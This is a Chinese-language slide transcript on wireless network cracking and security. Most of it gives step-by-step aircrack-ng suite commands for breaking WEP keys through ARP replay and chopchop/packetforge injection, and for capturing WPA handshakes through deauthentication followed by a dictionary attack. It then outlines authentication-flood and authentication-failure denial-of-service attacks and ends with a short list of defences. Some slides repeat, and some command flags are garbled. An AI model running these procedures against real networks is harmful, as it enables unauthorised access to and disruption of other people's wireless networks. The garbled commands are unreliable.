无线的破解与安全

无线的破解与安全 姜辉

提纲相关背景 WEP的破解（1） WPA的破解无线安全

相关背景 无线网卡的选择芯片。Athetos ，Prism，Ralink （USB）无线网卡的硬件/固件版本无线网卡的功率及规格基本知识 SSID（Service Set Identifier,服务集标识符）一个唯一的标识符，最大长度32 WAP（wireless Application Protocol，无线应用协议） AP((wireless Access Point)) 无线接入点

相关背景 几个比较好的无线破解系统（Linux） BackTrack WiFiSlax WiFiWay Linux系统下无线探测工具 Kismet（Bt4自带） Wicrawl（扩展功能较好） AirSnort（具有自动抓包并破解WEP的能力） Bt4下使用iwlist或者

相关背景 几个比较出名linux系统 BackTrack WiFiSlax WiFiWay Linux系统下无线探测工具 Kismet（Bt4自带） Wicrawl（扩展功能较好） AirSnort（具有自动抓包并破解WEP的能力） Bt4下使用iwlist或者Internet-》Wicd Network Manager

WEP破解技术（1） Ifconfig –a wlan0 up 载入无线网卡的驱动程序首先要在vmware中连接探测无线AP的信息 airmon-ng start wlan0 监控频道成功后会开启一个监控网卡，如 mon0 airodump–ng –w dump –channel 6 mon0 aireplay-ng -3 –b ap’s MAC –h client’s MAC –x 1024 mon0 aircrack-ng –x –f 2 dump-01.cap

WEP破解技术（2） Ifconfig –a wlan0 up 载入无线网卡的驱动程序首先要在vmware中连接探测无线AP的信息 airmon-ng start wlan0 监控频道成功后会开启一个监控网卡，如 mon0 airodump –ng –ivs –c 监控频道–w dump –channel 6 mon0 aireplay-ng -1 0 –e ap’s essid ap’s MAC –h client’s MAC (网卡) –x mon0

WEP破解技术（2） aireplay-ng -4 –b AP’s MAC –h client’s MAC mon0 Chopchop 攻击生产可用的密钥数据流文件会生产一个cap和一个xor的文件 packetforge-ng –o –a AP’MAC –h client’s MAC -k 255.255.255.255 -1 255.255.255.255 –y fragment xor file –w dump1 airepaly-ng -2 –r dump1 mon0 aircrack-ng dump*.ivs

WAP破解技术 airmon-ng start wlan0 没有正常的加载驱动 airodump-ng -w dump–channel 频道 mon0 Dump为数据包 aireplay-ng -o 攻击次数 AP’s MAC –h client’s MAC mon0 WPA握手的验证 zcat /pentest/password/dictionaries/ wordlist.txt.Z >password.txt 生产字典（bt4 自带） aircrack-ng –w password.txt -z dump01.cap 破解

WEP破解流程

无线的安全

身份验证洪泛攻击 攻击原理关联的客户端向AP发送大量伪造身份验证请求当请求超出AP的承载能力时断开与客户的连接攻击实现使用看似合法的但是随机生成MAC伪造工作站向AP发送大量的虚假请求

身份验证失败攻击 攻击原理关联的客户端向AP伪造客户端无效验证帧 AP将受害客户端更新为状态1 攻击实现关联客户端伪造某合法客户端向AP发送无效的验证帧 AP认为该验证请求无效将受害者的状态更新为1

总结尽量使用相对安全的防御措施隐藏无线局域网的SSID号码使用WPA加密实施MAC地址过滤进行802.1x认证控制无线信号的范围

无线的破解与安全

无线的破解与安全

Presentation Transcript